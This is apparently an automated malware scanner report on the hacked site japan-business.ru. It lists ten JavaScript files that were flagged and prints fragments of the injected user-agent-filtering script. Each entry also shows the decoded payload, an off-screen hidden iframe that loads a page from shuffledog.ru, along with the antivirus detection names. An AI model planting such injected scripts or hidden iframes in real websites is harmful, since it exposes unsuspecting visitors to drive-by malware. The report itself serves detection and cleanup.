New scan:

Malware Scanner report for japan-business.ru

Malicious/Suspicious/Total urls checked
1/9/15
10 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "japan-business.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=japan-business.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://japan-business.ru/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://japan-business.ru/
200 OK
Content-Length: 16234
Content-Type: text/html
clean
http://japan-business.ru/media/system/js/caption.js
200 OK
Content-Length: 6537
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function bobnilagun(){
var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser',
...[2846 bytes skipped]...

Decoded script:


<iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe>

http://japan-business.ru/media/widgetkit/js/jquery.js
200 OK
Content-Length: 98768
Content-Type: application/javascript
clean
http://japan-business.ru/media/widgetkit/js/jquery.plugins.js
200 OK
Content-Length: 13804
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function bobnilagun(){
var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser',
...[3734 bytes skipped]...

Decoded script:


<iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe>

http://japan-business.ru/media/widgetkit/js/responsive.js
200 OK
Content-Length: 6157
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function bobnilagun(){
var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser',
...[3010 bytes skipped]...

Decoded script:


<iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe>

http://japan-business.ru/media/widgetkit/widgets/accordion/js/accordion.js
200 OK
Content-Length: 6698
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function bobnilagun(){
var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser',
...[3517 bytes skipped]...

Decoded script:


<iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe>

http://japan-business.ru/media/widgetkit/widgets/gallery/js/lazyloader.js
200 OK
Content-Length: 5255
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function bobnilagun(){
var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser',
...[2012 bytes skipped]...

Decoded script:


<iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe>

http://japan-business.ru/media/widgetkit/widgets/map/js/lazyloader.js
200 OK
Content-Length: 4839
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function bobnilagun(){
var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser',
...[1590 bytes skipped]...

Decoded script:


<iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe>

http://japan-business.ru/media/widgetkit/widgets/slideset/js/lazyloader.js
200 OK
Content-Length: 5522
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function bobnilagun(){
var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser',
...[2296 bytes skipped]...

Decoded script:


<iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe>

http://japan-business.ru/media/widgetkit/widgets/slideshow/js/lazyloader.js
200 OK
Content-Length: 6731
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function bobnilagun(){
var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser',
...[3538 bytes skipped]...

Decoded script:


<iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe>

http://japan-business.ru/media/widgetkit/widgets/twitter/twitter.js
200 OK
Content-Length: 5604
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function bobnilagun(){
var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser',
...[2391 bytes skipped]...

Decoded script:


<iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe>

http://japan-business.ru/templates/japan/script.js
200 OK
Content-Length: 15706
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function bobnilagun(){
var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome'
... 3436 bytes are skipped ...
nction(e) {
e = e || window.event;
button = e.target || e.srcElement;
wrapper = button.parentNode;
if (!artHasClass(button, 'active')) wrapper.className = wrapper.className.replace(/active/, "");
});
}
}
}

artLoadEvent.add(function() { artButtonsSetupJsHover("art-button"); });




artLoadEvent.add(function() {
artButtonsSetupJsHover("button");
artButtonsSetupJsHover("readon");
});

Decoded script:


<iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe>

Antivirus reports:

Ikarus
HTML.Rce
DrWeb
JS.IFrame.566
Fortinet
JS/IFrame.XX!tr
Avira
HTML/Rce.Gen
Sophos
Troj/JSRedir-LH

http://japan-business.ru/nasha-deyatelnost.html
200 OK
Content-Length: 17619
Content-Type: text/html
clean
http://japan-business.ru/restorannyy-biznes.html
200 OK
Content-Length: 51786
Content-Type: text/html
clean
http://japan-business.ru/predlozheniya-iz-yaponii/
200 OK
Content-Length: 17032
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: japan-business.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 21 Sep 2014 04:19:58 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Length: 16234
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 21 Sep 2014 04:19:58 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: c947f98757d57d5d992c3fc7fbf4d8b9=68j6q9ffcqa1dpcniof9v7qr30; path=/
X-Powered-By: PleskLin

...16234 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: japan-business.ru
Referer: http://www.google.com/search?q=japan-business.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.